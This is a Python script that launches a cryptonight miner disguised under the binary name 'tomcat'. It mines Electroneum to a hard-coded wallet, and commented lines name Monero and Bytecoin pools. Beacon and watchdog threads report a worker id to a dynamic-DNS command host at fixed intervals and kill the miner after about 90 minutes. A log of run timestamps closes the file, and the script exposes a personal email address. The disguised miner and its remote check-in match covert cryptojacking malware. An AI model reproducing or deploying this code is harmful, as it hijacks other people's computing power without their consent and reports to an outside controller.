import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:42:06.134397
#2018-02-17 16:29:04.977003
#2018-02-17 18:17:05.228524
#2018-02-17 20:03:01.608297
#2018-02-17 21:51:06.568527
#2018-02-17 23:36:06.071656
#2018-02-18 01:25:04.556947
#2018-02-18 03:12:07.471407
#2018-02-18 04:59:01.700598
#2018-02-18 06:49:05.956648
#2018-02-18 08:38:03.662123
#2018-02-18 10:24:03.622904
#2018-02-18 12:10:03.956728
#2018-02-18 13:56:03.529589
#2018-02-18 15:46:03.836683
#2018-02-18 17:35:08.359328
#2018-02-18 19:23:04.843961
#2018-02-18 21:08:03.550621
#2018-02-18 22:54:06.910702
#2018-02-19 00:41:07.278753
#2018-02-19 02:27:01.868654
#2018-02-19 04:13:07.498224
#2018-02-19 05:57:01.618889
#2018-02-19 07:46:06.448355
#2018-02-19 09:36:08.461187
#2018-02-19 11:25:03.883306
#2018-02-19 13:13:05.602600
#2018-02-19 15:02:07.968376
#2018-02-19 16:51:05.749698
#2018-02-19 18:37:05.862699
#2018-02-19 20:22:06.752197
#2018-02-19 22:12:04.714377
#2018-02-19 23:58:02.152949
#2018-02-20 01:44:05.586870
#2018-02-20 03:31:05.888462
#2018-02-20 05:18:05.288379
#2018-02-20 07:01:05.455657
#2018-02-20 08:47:08.184758
#2018-02-20 10:31:04.850610
#2018-02-20 12:16:09.117182
#2018-02-20 14:03:04.648763
#2018-02-20 15:46:04.794749
#2018-02-20 17:32:05.761224
#2018-02-20 19:19:07.225050
#2018-02-20 21:07:01.400050
#2018-02-20 22:52:01.550664
#2018-02-21 00:36:07.005847
#2018-02-21 02:22:07.691281
#2018-02-21 04:09:03.482164
#2018-02-21 05:56:04.142742
#2018-02-21 07:45:04.210444
#2018-02-21 09:31:03.671674
#2018-02-21 11:19:02.101915
#2018-02-21 13:07:02.056254
#2018-02-21 14:55:05.777284
#2018-02-21 16:43:04.972808
#2018-02-21 18:32:06.611046
#2018-02-21 20:16:06.835948
#2018-02-21 22:03:07.119233
#2018-02-21 23:53:05.373717
#2018-02-22 01:41:08.145500
#2018-02-22 03:29:02.196618
#2018-02-22 05:16:01.488767
#2018-02-22 06:59:07.384884
#2018-02-22 08:47:04.690966
#2018-02-22 10:35:01.429106
#2018-02-22 12:20:04.860558
#2018-02-22 14:07:06.154789
#2018-02-22 15:53:05.680547
#2018-02-22 17:40:08.504117
#2018-02-22 19:27:08.043881
#2018-02-22 21:18:09.571844
#2018-02-22 23:03:03.968654
#2018-02-23 00:48:05.394319
#2018-02-23 02:36:05.956083
#2018-02-23 04:23:04.492986
#2018-02-23 06:09:02.216579
#2018-02-23 07:54:04.020807
#2018-02-23 10:09:07.250929
#2018-02-23 12:01:08.216115
#2018-02-23 13:49:01.646026
#2018-02-23 15:37:08.548653
#2018-02-23 17:25:07.720237
#2018-02-23 19:12:06.908383
#2018-02-23 20:58:01.674534
#2018-02-23 22:44:08.209495
#2018-02-24 00:32:06.973937
#2018-02-24 02:23:04.294659
#2018-02-24 04:12:06.696951
#2018-02-24 06:00:07.907152
#2018-02-24 07:48:04.006546
#2018-02-24 09:32:02.036065
#2018-02-24 11:25:04.290197
#2018-02-24 13:14:04.735419
#2018-02-24 15:04:06.068716
#2018-02-24 16:53:05.155892
#2018-02-24 18:41:04.816924
#2018-02-24 20:32:04.287451
#2018-02-24 22:33:06.643774
#2018-02-25 01:41:08.413897
#2018-02-25 05:09:01.322923
#2018-02-25 10:31:02.167574